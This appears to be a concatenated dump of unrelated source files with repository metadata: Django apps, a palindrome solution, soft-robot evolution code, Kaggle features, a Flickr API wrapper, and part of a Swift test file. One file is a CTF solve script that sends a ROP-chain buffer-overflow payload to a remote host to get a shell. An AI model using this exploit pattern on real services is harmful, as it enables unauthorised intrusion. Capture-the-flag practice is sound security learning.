"stefan.pochmann@gmail.com"
] | stefan.pochmann@gmail.com |
f86f346345b1e788b5612e8ac5f117bc6c0dbce1 | e168a4b9e7997b5266df4c1fe2afbaf0ed031fed | /url_shortener/profiles/forms.py | 470c5cd6344634922a1279b0c41660591cc5b23a | [] | no_license | AaronScruggs/urly-bird | 756eba26f21c66e78ed93bf6f936b50fb927aaef | a27314afb309de42230852fc2bd35416dece46d9 | refs/heads/master | 2021-01-22T01:18:59.907605 | 2016-04-05T07:01:53 | 2016-04-05T07:01:53 | 55,178,264 | 0 | 0 | null | 2016-03-31T19:45:02 | 2016-03-31T19:45:01 | null | UTF-8 | Python | false | false | 217 | py | from django import forms
from django.contrib.auth.models import User
from profiles.models import Profile
class ImageUpdateForm(forms.ModelForm):
"""ModelForm exposing only the Profile.image field for update."""
class Meta:
model = Profile
fields = ("image",)
| [
"aarondscruggs@gmail.com"
] | aarondscruggs@gmail.com |
36c5318154387ad099df3c4c0100ceffc7f79f78 | 4b486da34cc3c0c6492eb0c183757c5a6903490e | /apps/organization/adminx.py | f1dd73b85b15a0c499ee46241b94d6882aabcd65 | [] | no_license | xxqyjk/MxOnline | 6c48e2bf807d6770efef2870866a7897ef5f5d69 | a4d147244d5603d145636671ab246ca88490a0fa | refs/heads/master | 2020-03-20T12:35:41.657651 | 2018-06-19T03:45:54 | 2018-06-19T03:45:54 | 137,435,213 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,175 | py | #_*_ coding: utf-8 _*_
__author__ = 'cherryban'
__date__ = '2018/6/19 9:24'
import xadmin
from .models import CityDict, CourseOrg, Teacher
class CityDictAdmin(object):
"""xadmin options for CityDict: list columns, search fields, filters."""
list_display = ['name', 'desc', 'add_time']
search_fields = ['name', 'desc']
list_filter = ['name', 'desc', 'add_time']
class CourseOrgAdmin(object):
"""xadmin options for CourseOrg: list columns, search fields, filters."""
list_display = ['name', 'desc', 'click_nums', 'fav_nums', 'image', 'address', 'city', 'add_time']
search_fields = ['name', 'desc', 'click_nums', 'fav_nums', 'image', 'address', 'city']
list_filter = ['name', 'desc', 'click_nums', 'fav_nums', 'image', 'address', 'city', 'add_time']
class TeacherAdmin(object):
"""xadmin options for Teacher: list columns, search fields, filters."""
list_display = ['org', 'name', 'work_years', 'work_company', 'work_position', 'points','click_nums', 'fav_nums', 'add_time']
search_fields = ['org', 'name', 'work_years', 'work_company', 'work_position', 'points','click_nums', 'fav_nums']
list_filter = ['org', 'name', 'work_years', 'work_company', 'work_position', 'points','click_nums', 'fav_nums', 'add_time']
xadmin.site.register(CityDict, CityDictAdmin)
xadmin.site.register(CourseOrg, CourseOrgAdmin)
xadmin.site.register(Teacher, TeacherAdmin) | [
"xxqyjk@163.com"
] | xxqyjk@163.com |
a74b58b3e5974f4098f7a4932dfa112f9fedbc7e | 19ddab74600f71700a6b693281d0180d5271f295 | /程序员面试金典/01_04_回文排列.py | bc02963092c9dc8e4d739287a6103fd74aad53ce | [] | no_license | zhulf0804/Coding.Python | 4d55a430da1a8077c81feba65c13ac654aaf094a | 46ab03e23d15ebd5434ef4dd5ae99130000b00a5 | refs/heads/master | 2022-09-14T18:40:59.880941 | 2022-08-20T08:25:51 | 2022-08-20T08:25:51 | 213,113,482 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 337 | py | class Solution:
def canPermutePalindrome(self, s: str) -> bool:
d = {}
for item in s:
d[item] = d.get(item, 0) + 1
is_odd = False
for k, v in d.items():
if v & 1 == 1:
if is_odd:
return False
is_odd = True
return True | [
"zhulf0804@gmail.com"
] | zhulf0804@gmail.com |
42ca502857139d862fd33e501566af85364c52ba | fb509a40f884456371435b633242f29af789174d | /account/views.py | 83299a0ba0a4296954cc8ed0fd0cea5906a57e80 | [] | no_license | dorikoirony/django_ph | 64c7b17190c8dfdd165c678fc43c075dc032858e | 49067146ffa2d9e410de35fc62f2a59cb74a31ea | refs/heads/master | 2020-05-04T19:44:52.227154 | 2019-04-15T08:25:03 | 2019-04-15T08:25:03 | 179,406,178 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,487 | py | from django.shortcuts import render,redirect
from django.contrib.auth.models import User
from django.contrib import auth
# Create your views here.
def signup(request):
    """Render the signup form on GET; create a new account on POST.

    POST keys and template names are kept exactly as in the original
    (Chinese form-field names).  Any other HTTP method falls through
    and returns None, as before.
    """
    if request.method == 'GET':
        return render(request, 'signup.html')
    if request.method == 'POST':
        user_name = request.POST['用户名']
        password1 = request.POST['密码']
        password2 = request.POST['确认密码']
        try:
            # An existing account with this username blocks signup.
            User.objects.get(username=user_name)
        except User.DoesNotExist:
            if password1 == password2:
                User.objects.create_user(username=user_name, password=password1)
                return redirect('主页')
            return render(request, 'signup.html', {'密码错误': '两次密码不一致!'})
        return render(request, 'signup.html', {'用户名错误': '存在该账户'})
def login(request):
    """Render the login form on GET; authenticate and log in on POST.

    On failed authentication, re-render the form with an error message.
    Any other HTTP method falls through and returns None, as before.
    """
    if request.method == 'GET':
        return render(request, 'login.html')
    if request.method == 'POST':
        user = auth.authenticate(
            username=request.POST['用户名'],
            password=request.POST['密码'],
        )
        if user:
            auth.login(request, user)
            return redirect('主页')
        return render(request, 'login.html', {'登录错误': '用户名或密码错误'})
def logout(request):
if request.method == 'POST':
auth.logout(request)
return redirect('主页') | [
"1033188854@qq.com"
] | 1033188854@qq.com |
622db43d8423045eb3047bcc7e89c91ca043dd42 | f25429ea099ba1d930553ebcfd3f61ec1383141a | /historia/migrations/0008_auto_20210629_1800.py | 5c473c035ede96037a4ccee80a29fa7d8495ffb1 | [] | no_license | MoacyrFMoreira/dmtable | 3da49cd0c58e334abb8f00ec2c2a3e7d87fd7208 | 8b2e41125df00a9ecd365be74f4fcacd225bbce4 | refs/heads/main | 2023-06-29T07:05:44.121912 | 2021-07-24T04:45:22 | 2021-07-24T04:45:22 | 388,999,334 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 447 | py | # Generated by Django 3.1.3 on 2021-06-29 21:00
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('historia', '0007_auto_20210629_1354'),
]
operations = [
migrations.AlterField(
model_name='post',
name='date',
field=models.DateTimeField(default=datetime.datetime(2021, 6, 29, 18, 0, 17, 945116)),
),
]
| [
"mmoreira@accedian.com"
] | mmoreira@accedian.com |
120016fa3909ffc968939614e61fd3313f336cfe | 96f5d1d1cc1fc92bd11c4288246245722a7fec20 | /College/urls.py | c6064dc3cd002341ea83f836f5e19d76f754d261 | [] | no_license | vagdevik/Django-WishList | 10307c168a1d9d3907fcb20386e2b1a816898892 | 49d0fe3f442f34f67242a7958e6b128df7d6fb31 | refs/heads/master | 2021-05-07T14:17:29.037822 | 2017-11-07T07:49:51 | 2017-11-07T07:49:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 836 | py | """College URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url,include
from django.contrib import admin
from Book import views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^Books/',include('Book.urls')),
]
| [
"vagdevi.k15@iiits.in"
] | vagdevi.k15@iiits.in |
e2ebb7364de4eccca18cc5bce6a33b392ac1e28a | 7fbb087f862f0a1351454706dee139e112addff3 | /evosoro/exp/RSS_5D_Two_Diag_Legs_Control.py | 4782b44d2201bd25b13af1d9b2175f558c6c2fc0 | [] | no_license | fagan2888/2019-RSS | 5e21b5ea992c82620d5d7a32200a0a2243057fda | 4801255d7cff228772532732e18d7e7d458b81f1 | refs/heads/master | 2022-06-05T05:09:03.588134 | 2020-04-30T19:56:14 | 2020-04-30T19:56:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,706 | py | import random
import os
import sys
import numpy as np
import subprocess as sub
from evosoro.base import Sim, Env, ObjectiveDict
from evosoro.networks import DirectEncoding, CPPN
from evosoro.softbot import Genotype, Phenotype, Population
from evosoro.tools.algorithms import ParetoOptimization
from evosoro.tools.checkpointing import continue_from_checkpoint
from evosoro.tools.utils import quadruped
SIMULATOR_DIR = "../../_voxcad"
PICKLE_DIR = "../pretrained/quadrupeds"
SEED = int(sys.argv[1])
MAX_TIME = float(sys.argv[2])
# SEED = 1
# MAX_TIME = 1
PICKLE_GEN = 1500
PICKLE = "{0}/run_{1}/Gen_{2}.pickle".format(PICKLE_DIR, (SEED-1) % 5 + 1, PICKLE_GEN)
QUAD_SIZE = (6, 6, 5)
IND_SIZE = QUAD_SIZE
STIFFNESS = 1e7
POP_SIZE = 50
MAX_GENS = 5000
NUM_RANDOM_INDS = 1
INIT_TIME = 0.4
SIM_TIME = 4 + INIT_TIME # includes init time
TEMP_AMP = 39.4714242553 # 50% volumetric change with temp_base=25: (1+0.01*(39.4714242553-25))**3-1=0.5
FREQ = 5.0
DT_FRAC = 0.9
MIN_TEMP_FACT = 0.25
TIME_TO_TRY_AGAIN = 30
MAX_EVAL_TIME = 75
SAVE_VXA_EVERY = MAX_GENS+1 # never
CHECKPOINT_EVERY = 1 # gen(s)
FITNESS_TAG = "normAbsoluteDisplacement"
RUN_DIR = "run_{}".format(SEED)
RUN_NAME = "RegenQuad"
# copy the simulator executable into the working directory
sub.call("cp {}/voxelyzeMain/voxelyze .".format(SIMULATOR_DIR), shell=True)
sub.call("chmod 755 voxelyze", shell=True)
pre_damage_shape = quadruped(QUAD_SIZE)
post_damage_shape = quadruped(QUAD_SIZE)
post_damage_shape[:IND_SIZE[1]/2, :IND_SIZE[1]/2, :IND_SIZE[2]/2] = 0 # leg 1
# post_damage_shape[IND_SIZE[1]/2:, :IND_SIZE[1]/2, :IND_SIZE[2]/2] = 0 # leg 2
# post_damage_shape[:IND_SIZE[1]/2, IND_SIZE[1]/2:, :IND_SIZE[2]/2] = 0 # leg 3
post_damage_shape[IND_SIZE[1]/2:, IND_SIZE[1]/2:, :IND_SIZE[2]/2] = 0 # leg 4
class MyGenotype(Genotype):
"""Genotype pairing a frozen voxel-material layout with an evolvable CPPN controller."""
def __init__(self):
Genotype.__init__(self, orig_size_xyz=IND_SIZE)
# quadrupedal structure
# freeze=True: the material (body) network is never mutated, so the
# morphology stays fixed while evolution acts on the controller only.
self.add_network(DirectEncoding(output_node_name="material", orig_size_xyz=IND_SIZE), freeze=True)
self.to_phenotype_mapping.add_map(name="material", tag="<Data>", output_type=int, logging_stats=None)
# controller (phi; phase-offsets)
# The CPPN producing per-voxel actuation phase offsets is the part
# of the genotype that evolves.
self.add_network(CPPN(output_node_names=["phase_offset"]))
self.to_phenotype_mapping.add_map(name="phase_offset", tag="<PhaseOffset>")
MyGenotype.NET_DICT = {"material": post_damage_shape}
if not os.path.isfile("./" + RUN_DIR + "/pickledPops/Gen_0.pickle"):
random.seed(SEED)
np.random.seed(SEED)
my_sim = Sim(dt_frac=DT_FRAC, simulation_time=SIM_TIME, fitness_eval_init_time=INIT_TIME,
min_temp_fact=MIN_TEMP_FACT)
my_env = Env(temp_amp=TEMP_AMP, frequency=FREQ, muscle_stiffness=STIFFNESS)
my_objective_dict = ObjectiveDict()
my_objective_dict.add_objective(name="fitness", maximize=True, tag=FITNESS_TAG)
my_objective_dict.add_objective(name="age", maximize=False, tag=None)
my_pop = Population(my_objective_dict, MyGenotype, Phenotype, pop_size=POP_SIZE)
my_optimization = ParetoOptimization(my_sim, my_env, my_pop)
my_optimization.run(max_hours_runtime=MAX_TIME, max_gens=MAX_GENS, num_random_individuals=NUM_RANDOM_INDS,
directory=RUN_DIR, name=RUN_NAME, max_eval_time=MAX_EVAL_TIME,
time_to_try_again=TIME_TO_TRY_AGAIN, checkpoint_every=CHECKPOINT_EVERY,
save_vxa_every=SAVE_VXA_EVERY)
else:
continue_from_checkpoint(directory=RUN_DIR, max_hours_runtime=MAX_TIME, max_eval_time=MAX_EVAL_TIME,
time_to_try_again=TIME_TO_TRY_AGAIN, checkpoint_every=CHECKPOINT_EVERY,
save_vxa_every=SAVE_VXA_EVERY)
| [
"sam.kriegman@uvm.edu"
] | sam.kriegman@uvm.edu |
56bc12f05d19205c8116be58692e496f43a60321 | 5f7a50f57fce3894a66180ecf77d13e7927c0860 | /DarkCON2021/Pwn_Easy-ROP/src/solve.py | 5f12093c1fb72b3039b36bfa3af66495111131f9 | [] | no_license | Mumuzi7179/CTFWriteups | 2a0282bd81db753df644f0aa122078396ee2bb8c | 9c918a788e18a41092834431ab137b5d102aea90 | refs/heads/master | 2023-07-17T00:31:05.140197 | 2021-03-19T19:56:13 | 2021-03-19T19:56:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | from pwn import *
from subprocess import Popen, PIPE
import sys
host = '65.1.92.179'
port = 49153
# The result of ROPgadget execution (!# part of it)
f = open("ropgadgetRes.py", "r")
pycode = f.read()
exec(pycode)
ropchain = p
off = 'a'*72
payload = off + ropchain
print(payload)
#t = process('./easy-rop')
t = remote(host, port)
t.sendline(payload)
t.interactive()
t.close() | [
"a.ahsani248@gmail.com"
] | a.ahsani248@gmail.com |
4e7fc439451fd0522ef5071a18742ae80ab6cbcf | 077240acd51d76e5882d89f31970dc9a0b1287a5 | /winston_jobs/migrations/0001_initial.py | 5bc447414a4257c347ffa55b3342dd0f31976fc3 | [] | no_license | Madrox/Winston | f8bb3c425c98613c2e0bf08ce6a33b07d702ee7e | f9ecc0fa594fa7cbfcaecf49cb6c465583356030 | refs/heads/master | 2021-01-13T05:24:14.695275 | 2017-04-22T21:31:32 | 2017-04-22T21:31:32 | 81,413,386 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,666 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-02-14 02:44
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='History',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('run_date', models.DateTimeField(auto_now_add=True)),
],
),
migrations.CreateModel(
name='Job',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100, unique=True)),
],
),
migrations.CreateModel(
name='KeyVal',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('key', models.CharField(max_length=100)),
('val', models.TextField(blank=True)),
('job', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='winston_jobs.Job')),
],
),
migrations.AddField(
model_name='history',
name='job',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='winston_jobs.Job'),
),
migrations.AlterUniqueTogether(
name='keyval',
unique_together=set([('job', 'key')]),
),
]
| [
"david.horn@disney.com"
] | david.horn@disney.com |
16ae617aa0dff53873785822c7cb2db033f9590b | 494e3fbbdff5cf6edb087f3103ad5f15acbc174f | /schedule/migrations/0002_auto_20180727_2329.py | d0a6847d6321e79defcf1bfbd06aa6f38fb59def | [] | no_license | TalentoUnicamp/my | 1209048acdedbb916b8ae8ec80761d09f6ad7754 | 3d87a33cd282d97dbbbd5f62658f231456f12765 | refs/heads/master | 2020-03-23T21:12:58.316033 | 2018-08-14T06:11:36 | 2018-08-14T06:11:36 | 142,090,262 | 11 | 0 | null | 2018-08-17T05:13:26 | 2018-07-24T01:53:23 | JavaScript | UTF-8 | Python | false | false | 1,698 | py | # Generated by Django 2.0.3 on 2018-07-28 02:29
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('schedule', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='event',
name='attended',
field=models.ManyToManyField(null=True, related_name='attended_events', to='user_profile.Profile'),
),
migrations.AlterField(
model_name='event',
name='attendees',
field=models.ManyToManyField(null=True, related_name='selected_events', to='user_profile.Profile'),
),
migrations.AlterField(
model_name='event',
name='event_type',
field=models.CharField(choices=[('Meta', 'Meta'), ('Keynote', 'Keynote'), ('Workshop', 'Workshop'), ('Palestra', 'Palestra')], max_length=20),
),
migrations.AlterField(
model_name='event',
name='max_attendees',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='event',
name='speaker',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='my_events', to='user_profile.Profile'),
),
migrations.AlterField(
model_name='feedback',
name='comments',
field=models.TextField(blank=True),
),
migrations.AlterField(
model_name='feedback',
name='rating',
field=models.IntegerField(blank=True, null=True),
),
]
| [
"gustavomaronato@gmail.com"
] | gustavomaronato@gmail.com |
65d1eb9d9c06b987fe9a9cc21d850cc58d620bfc | e82c1576b6e25d357b23c481ea48aea86272c227 | /venv/Scripts/django-admin.py | 94eb30a8d92e4cd11f2972d4ead9be43bf2044be | [] | no_license | MatheusLeall/api-curriculos | d72d28f27576394abcdcd352895e9b6ce7e3c8c2 | b49d945579d22b66fb57d71644e065f0f664dd24 | refs/heads/master | 2022-12-18T14:26:18.266325 | 2020-09-24T14:59:33 | 2020-09-24T14:59:33 | 298,092,184 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 725 | py | #!c:\users\matheus\documents\django projects\authentication_scheme\venv\scripts\python.exe
# When the django-admin.py deprecation ends, remove this script.
import warnings
from django.core import management
try:
from django.utils.deprecation import RemovedInDjango40Warning
except ImportError:
raise ImportError(
'django-admin.py was deprecated in Django 3.1 and removed in Django '
'4.0. Please manually remove this script from your virtual environment '
'and use django-admin instead.'
)
if __name__ == "__main__":
warnings.warn(
'django-admin.py is deprecated in favor of django-admin.',
RemovedInDjango40Warning,
)
management.execute_from_command_line()
| [
"matheuscardoso.pro@gmail.com"
] | matheuscardoso.pro@gmail.com |
9abea3f326ea59ebd86d1c7b1d83e63ad82ffd60 | 6fcfb638fa725b6d21083ec54e3609fc1b287d9e | /python/ChenglongChen_Kaggle_HomeDepot/Kaggle_HomeDepot-master/Code/Chenglong/feature_group_distance.py | 8be14bcf62e8f822d47294b1071b3b95a6516e0a | [] | no_license | LiuFang816/SALSTM_py_data | 6db258e51858aeff14af38898fef715b46980ac1 | d494b3041069d377d6a7a9c296a14334f2fa5acc | refs/heads/master | 2022-12-25T06:39:52.222097 | 2019-12-12T08:49:07 | 2019-12-12T08:49:07 | 227,546,525 | 10 | 7 | null | 2022-12-19T02:53:01 | 2019-12-12T07:29:39 | Python | UTF-8 | Python | false | false | 4,848 | py | # -*- coding: utf-8 -*-
"""
@author: Chenglong Chen <c.chenglong@gmail.com>
@brief: group relevance based distance features
@note: such features are not used in final submission
"""
import re
import string
import numpy as np
import pandas as pd
import config
from config import TRAIN_SIZE
from utils import dist_utils, ngram_utils, nlp_utils
from utils import logging_utils, pkl_utils, time_utils
from feature_base import BaseEstimator, StandaloneFeatureWrapper, PairwiseFeatureWrapper
# tune the token pattern to get a better correlation with y_train
# token_pattern = r"(?u)\b\w\w+\b"
# token_pattern = r"\w{1,}"
# token_pattern = r"\w+"
# token_pattern = r"[\w']+"
token_pattern = " " # just split the text into tokens
# -------------------- Group by (obs, relevance) based distance features ----------------------------------- #
# Something related to Query Expansion
class GroupRelevance_Ngram_Jaccard(BaseEstimator):
"""Single aggregation features"""
def __init__(self, obs_corpus, target_corpus, id_list, dfTrain, target_field, relevance, ngram, aggregation_mode=""):
super().__init__(obs_corpus, target_corpus, aggregation_mode, id_list)
self.dfTrain = dfTrain[dfTrain["relevance"] != 0].copy()
self.target_field = target_field
self.relevance = relevance
self.relevance_str = self._relevance_to_str()
self.ngram = ngram
self.ngram_str = ngram_utils._ngram_str_map[self.ngram]
def __name__(self):
if isinstance(self.aggregation_mode, str):
feat_name = "Group_%sRelevance_%s_Jaccard_%s"%(
self.relevance_str, self.ngram_str, string.capwords(self.aggregation_mode))
elif isinstance(self.aggregation_mode, list):
feat_name = ["Group_%sRelevance_%s_Jaccard_%s"%(
self.relevance_str, self.ngram_str, string.capwords(m)) for m in self.aggregation_mode]
return feat_name
def _relevance_to_str(self):
if isinstance(self.relevance, float):
return re.sub("\.", "d", str(self.relevance))
else:
return str(self.relevance)
def transform_one(self, obs, target, id):
df = self.dfTrain[self.dfTrain["search_term"] == obs].copy()
val_list = [config.MISSING_VALUE_NUMERIC]
if df is not None:
df = df[df["id"] != id].copy()
df = df[df["relevance"] == self.relevance].copy()
if df is not None and df.shape[0] > 0:
target_tokens = nlp_utils._tokenize(target, token_pattern)
target_ngrams = ngram_utils._ngrams(target_tokens, self.ngram)
val_list = []
for x in df[self.target_field]:
x_tokens = nlp_utils._tokenize(x, token_pattern)
x_ngrams = ngram_utils._ngrams(x_tokens, self.ngram)
val_list.append(dist_utils._jaccard_coef(x_ngrams, target_ngrams))
return val_list
# -------------------------------- Main ----------------------------------
def main():
logname = "generate_feature_group_distance_%s.log"%time_utils._timestamp()
logger = logging_utils._get_logger(config.LOG_DIR, logname)
dfAll = pkl_utils._load(config.ALL_DATA_LEMMATIZED_STEMMED)
dfTrain = dfAll.iloc[:TRAIN_SIZE].copy()
## run python3 splitter.py first
split = pkl_utils._load("%s/splits_level1.pkl"%config.SPLIT_DIR)
n_iter = len(split)
relevances_complete = [1, 1.25, 1.33, 1.5, 1.67, 1.75, 2, 2.25, 2.33, 2.5, 2.67, 2.75, 3]
relevances = [1, 1.33, 1.67, 2, 2.33, 2.67, 3]
ngrams = [1]
obs_fields = ["search_term"]
target_fields = ["product_title", "product_description"]
aggregation_mode = ["mean", "std", "max", "min", "median"]
## for cv
for i in range(n_iter):
trainInd, validInd = split[i][0], split[i][1]
dfTrain2 = dfTrain.iloc[trainInd].copy()
sub_feature_dir = "%s/Run%d" % (config.FEAT_DIR, i+1)
for target_field in target_fields:
for relevance in relevances:
for ngram in ngrams:
param_list = [dfAll["id"], dfTrain2, target_field, relevance, ngram, aggregation_mode]
pf = PairwiseFeatureWrapper(GroupRelevance_Ngram_Jaccard, dfAll, obs_fields, [target_field], param_list, sub_feature_dir, logger)
pf.go()
## for all
sub_feature_dir = "%s/All" % (config.FEAT_DIR)
for target_field in target_fields:
for relevance in relevances:
for ngram in ngrams:
param_list = [dfAll["id"], dfTrain, target_field, relevance, ngram, aggregation_mode]
pf = PairwiseFeatureWrapper(GroupRelevance_Ngram_Jaccard, dfAll, obs_fields, [target_field], param_list, sub_feature_dir, logger)
pf.go()
if __name__ == "__main__":
main()
| [
"659338505@qq.com"
] | 659338505@qq.com |
4fccba1e6cf207096ecb5d43ef2b1e74b10f2d7a | e41651d8f9b5d260b800136672c70cb85c3b80ff | /Notification_System/temboo/Library/Flickr/PhotoComments/LeaveComment.py | 86bbc8411b315c8fddfd9fdd48b7df1f6c43f6c9 | [] | no_license | shriswissfed/GPS-tracking-system | 43e667fe3d00aa8e65e86d50a4f776fcb06e8c5c | 1c5e90a483386bd2e5c5f48f7c5b306cd5f17965 | refs/heads/master | 2020-05-23T03:06:46.484473 | 2018-10-03T08:50:00 | 2018-10-03T08:50:00 | 55,578,217 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,616 | py | # -*- coding: utf-8 -*-
###############################################################################
#
# LeaveComment
# Add a comment to a specified photo on Flickr.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class LeaveComment(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the LeaveComment Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
super(LeaveComment, self).__init__(temboo_session, '/Library/Flickr/PhotoComments/LeaveComment')
def new_input_set(self):
return LeaveCommentInputSet()
def _make_result_set(self, result, path):
return LeaveCommentResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return LeaveCommentChoreographyExecution(session, exec_id, path)
class LeaveCommentInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the LeaveComment
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_APIKey(self, value):
"""
Set the value of the APIKey input for this Choreo. ((required, string) The API Key provided by Flickr (AKA the OAuth Consumer Key).)
"""
super(LeaveCommentInputSet, self)._set_input('APIKey', value)
def set_APISecret(self, value):
"""
Set the value of the APISecret input for this Choreo. ((required, string) The API Secret provided by Flickr (AKA the OAuth Consumer Secret).)
"""
super(LeaveCommentInputSet, self)._set_input('APISecret', value)
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((required, string) The Access Token retrieved during the OAuth process.)
"""
super(LeaveCommentInputSet, self)._set_input('AccessToken', value)
def set_AccessTokenSecret(self, value):
"""
Set the value of the AccessTokenSecret input for this Choreo. ((required, string) The Access Token Secret retrieved during the OAuth process.)
"""
super(LeaveCommentInputSet, self)._set_input('AccessTokenSecret', value)
def set_CommentText(self, value):
"""
Set the value of the CommentText input for this Choreo. ((required, string) The text of the comment you are adding.)
"""
super(LeaveCommentInputSet, self)._set_input('CommentText', value)
def set_PhotoID(self, value):
"""
Set the value of the PhotoID input for this Choreo. ((required, integer) The id of the photo to add a comment to)
"""
super(LeaveCommentInputSet, self)._set_input('PhotoID', value)
def set_ResponseFormat(self, value):
"""
Set the value of the ResponseFormat input for this Choreo. ((optional, string) The format that the response should be in. Valid values are: xml and json. Defaults to json.)
"""
super(LeaveCommentInputSet, self)._set_input('ResponseFormat', value)
class LeaveCommentResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the LeaveComment Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Flickr.)
"""
return self._output.get('Response', None)
class LeaveCommentChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return LeaveCommentResultSet(response, path)
| [
"shriswissfed@gmail.com"
] | shriswissfed@gmail.com |
e6187d164bdeea61b67cf310e711e2bfcf7d24ca | 765d96d61ccca9be466d25774dc83dc2fca65a48 | /kmp/1701_Cubeditor.py | 4a3a279b97247e27ddac79098d6e51f832a53eb0 | [] | no_license | myJamong/algorism_solved | 3deedb0edbffebf9a860fe8cc75a2e9a73c55baa | af6c1db030f56695e4c0d2e647f21fd1d564421f | refs/heads/master | 2023-07-06T17:44:19.401772 | 2021-08-17T04:54:46 | 2021-08-17T04:54:46 | 289,707,966 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 729 | py | # https://www.acmicpc.net/problem/1701
# Cubeditor
import sys
def make_table(p):
p_size = len(p)
table = [0] * p_size
j = 0
for i in range(1,p_size):
while j > 0 and p[i] != p[j]:
j = table[j-1]
if p[i] == p[j]:
j += 1
table[i] = j
return table
if __name__ == "__main__":
txt = sys.stdin.readline().strip()
result = 0
for i in range(len(txt)):
s = txt[i:] # 시작 지점을 0번째부터 쭉 봤을때 pi table을 만드는 것 자체가 앞에서부터 뒤어서부터 동일한 문자열 --> 같은 문자열 2개인 길이를 배열로 반환
table = make_table(s)
result = max(result,max(table))
print(result)
| [
"noreply@github.com"
] | myJamong.noreply@github.com |
db84e674ce7d15eff7e41c37de05990d4479b2a6 | 71c515d8411c06dbab6e91f15a755aa2fe4094ef | /test/unit/container/test_server.py | 627d67cdac73538e9d691292aff66ccf26eca4f2 | [] | no_license | mawentao007/swift | 6f54dc9e24db41d928b8f403bb18273d97d7f7aa | fc2de6d75f0e718f4a46bead57a71a19cdb0fb3e | refs/heads/master | 2021-03-12T20:18:48.961232 | 2013-10-29T14:14:47 | 2013-10-29T14:14:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 75,820 | py | # Copyright (c) 2010-2012 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import operator
import os
import mock
import unittest
from contextlib import contextmanager
from shutil import rmtree
from StringIO import StringIO
from tempfile import mkdtemp
from xml.dom import minidom
from eventlet import spawn, Timeout, listen
import simplejson
from swift.common.swob import Request, HeaderKeyDict
import swift.container
from swift.container import server as container_server
from swift.common.utils import mkdirs, public, replication
from swift.common.ondisk import normalize_timestamp
from test.unit import fake_http_connect
@contextmanager
def save_globals():
orig_http_connect = getattr(swift.container.server, 'http_connect',
None)
try:
yield True
finally:
swift.container.server.http_connect = orig_http_connect
class TestContainerController(unittest.TestCase):
"""Test swift.container.server.ContainerController"""
def setUp(self):
"""Set up for testing swift.object_server.ObjectController"""
self.testdir = os.path.join(mkdtemp(),
'tmp_test_object_server_ObjectController')
mkdirs(self.testdir)
rmtree(self.testdir)
mkdirs(os.path.join(self.testdir, 'sda1'))
mkdirs(os.path.join(self.testdir, 'sda1', 'tmp'))
self.controller = container_server.ContainerController(
